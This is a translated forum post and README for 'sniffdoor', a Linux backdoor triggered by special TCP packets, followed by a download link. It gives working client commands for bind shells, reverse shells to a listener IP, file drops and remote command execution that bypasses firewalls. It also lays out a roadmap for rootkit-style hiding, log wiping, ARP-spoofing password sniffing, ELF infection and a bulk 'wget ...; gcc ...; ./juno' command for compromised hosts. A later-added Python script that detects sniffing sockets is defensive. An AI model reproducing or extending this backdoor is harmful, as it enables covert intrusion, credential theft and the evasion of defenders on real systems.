Linux sniffdoor v 1.0

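Software author: wzt <[email protected]>
Source: Evil Octal Information Security Team (www.eviloctal.com)

Note: this article was first published at www.XSec.org and was later kindly submitted by the original author to the Evil Octal Information Security Team technical forum. Please credit the original site when reposting.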

SniffDoor V 1.0 (c) 2007 by wzt <[email protected]>
+--------------------------------------------------+

Sniffdoor is a Linux backdoor that is woken up by a
special TCP packet. It can bind a shell with a tty, and
it can send files in TCP packets, which means the
server side sniffs your files out of the special TCP
packets and saves them on the server. The client can
also send a shell command in the packet; the server
sniffs and executes it, so it can get around the firewall.

+--------------------------------------------------+
[USAGE]:

server:

$make;
./sniffdoor

client:
$make;
./sniffclient

sniffdoor <options> [remote_ip] [port] [command]

<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>

<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>

1. bindshell:
send a tcp packet to host 61.155.217.56, which then
binds a shell on port 999
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
port 22 is an active port on the host.

2.connect back door:
1).your server must listen on a port first (your ip
is 123.45.64.57):
./client -listen 999

2).send a tcp packet to host 61.155.217.56, which then
binds a shell to remote 123.45.64.57 on port 999
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999

3.send file:
1).send file with tcp packet.
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c

NOTE!
It can only send text files, not binary files.
If you fix this bug, mail me, thx.

4.execute command:
1).execute command with tcp packet.
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"

+--------------------------------------------------+

[THANKS]:

Thanks to baozi for testing the door all the time.

[END]:

Send any bugs to <[email protected]>.

-wzt

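PS: I have recently been working on an all-in-one for Linux; if anyone has good ideas, let's discuss them here.

The goal is an all-in-one penetration backdoor. With it we can penetrate other Linux/Windows machines from inside Linux, aiming for the point where, with sniffdoor in hand, you need nothing else.
I have the following feature suggestions. Please contribute your own ideas, both on major features and on the details of any particular feature, so that we can build a perfect Linux penetration backdoor.

1: htran with udp support: port htran from Windows, including socks5 (with username and password) --> somewhat difficult, e.g. client sends ip pack -proxy -bind eth0 port user pass --> nearly finished

2: Flexible connect-back settings.

3: Automatic startup: start via ELF insertion; pay attention to whether the host program still works properly, the name of the infected program, and similar issues.

4: Encrypted communication

5: portscanner with banner grabber

6: logcleaner --> very easy and somewhat necessary, heh, since other wipe tools already exist; of course, it is best to have one

7: Bring in ARP spoofing + a network sniffer to capture some cleartext passwords; if it could capture SMB it would be super strong --> moderate difficulty, fairly necessary. I think we can build the local sniffer first and add ARP gradually later

8: Hiding, hiding. The initial plan is to use a fake proc name to fool people, making it -bash, heh; after that, write an LKM to hide it, ideally with dynamic hiding.

9: Bring in ttysniffer --> extremely difficult, but very necessary

10: Merge the client and server into one, trim the parameters, and ship a cygwin build in the package so it can be used on Windows. Ideally it would include management of compromised hosts, to make it easy to send commands in bulk later, e.g. wget ip/juno.c;gcc juno.c -o juno ; ./juno www.xxx.com 80 :)

11: httpd ... multi-threaded ... four parameters: auth, port, directory, index, heh.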

./sniffclient -packet ip bind:9999
binds port 9999

./sniffclient -packet ip back:11.22.33.44:9999

sends the shell back to port 9999 on 11.22.33.44

Both sniffclient and sniffserver require root privileges.
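
A defender-side check for the packet-triggered listener this README describes, as an added example that is not part of sniffdoor or the original post: it lists AF_PACKET and raw TCP sockets from /proc and resolves each one to its owning process. It assumes the listener sniffs through one of those socket types, which the page does not state; the function names, sample /proc text and inode values are constructed.

```python
# Added example (not part of sniffdoor): list sockets that can sniff TCP traffic.
# Assumption: the listener uses an AF_PACKET or raw IP socket; the page does not say.
import glob, os, re

# Constructed sample /proc/net/packet and /proc/net/raw contents, not from a real host.
SAMPLE_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff8880a1b2c000 3      3    0003   2     1 0      0      48211
ffff8880a1b2d800 3      2    888e   3     1 0      0      20977
"""
SAMPLE_RAW = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   6: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 51930 2 0000000000000000 0
"""

def parse_packet(text):
    """AF_PACKET rows -> (inode, socket type, EtherType); Proto is printed in hex."""
    rows = (line.split() for line in text.splitlines()[1:])
    return [(int(f[8]), int(f[2]), int(f[3], 16)) for f in rows if len(f) >= 9]

def parse_raw(text):
    """Raw IPv4 rows -> (inode, IP protocol); the 'port' of local_address is the protocol."""
    rows = (line.split() for line in text.splitlines()[1:])
    return [(int(f[9]), int(f[1].split(":")[1], 16)) for f in rows if len(f) >= 10]

def sniffing_inodes(packet_text, raw_text):
    """Inodes of sockets that receive TCP segments addressed to other sockets."""
    hits = {i for i, _type, proto in parse_packet(packet_text)
            if proto in (0x0003, 0x0800)}            # ETH_P_ALL, ETH_P_IP
    hits |= {i for i, proto in parse_raw(raw_text) if proto == 6}  # IPPROTO_TCP
    return hits

def owners(inodes, proc="/proc"):
    """Map socket inodes to (pid, exe path) via /proc/<pid>/fd; run as root."""
    found = {}
    for fd in glob.glob(f"{proc}/[0-9]*/fd/*"):
        try:
            m = re.fullmatch(r"socket:\[(\d+)\]", os.readlink(fd))
            if m and int(m.group(1)) in inodes:
                pid = fd.split("/")[-3]
                found[int(m.group(1))] = (int(pid), os.readlink(f"{proc}/{pid}/exe"))
        except OSError:
            continue                                  # process exited or access denied
    return found

if __name__ == "__main__":
    with open("/proc/net/packet") as p, open("/proc/net/raw") as r:
        for inode, (pid, exe) in owners(sniffing_inodes(p.read(), r.read())).items():
            print(f"inode {inode}: pid {pid} exe {exe}")
```

Legitimate tools such as tcpdump or a DHCP client also hold these sockets, so compare the reported exe paths against what is expected on the host. A sniffing inode with no owner found in /proc is itself worth investigating.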

Download (just get it from Evil Octal): sniffdoor.tgz
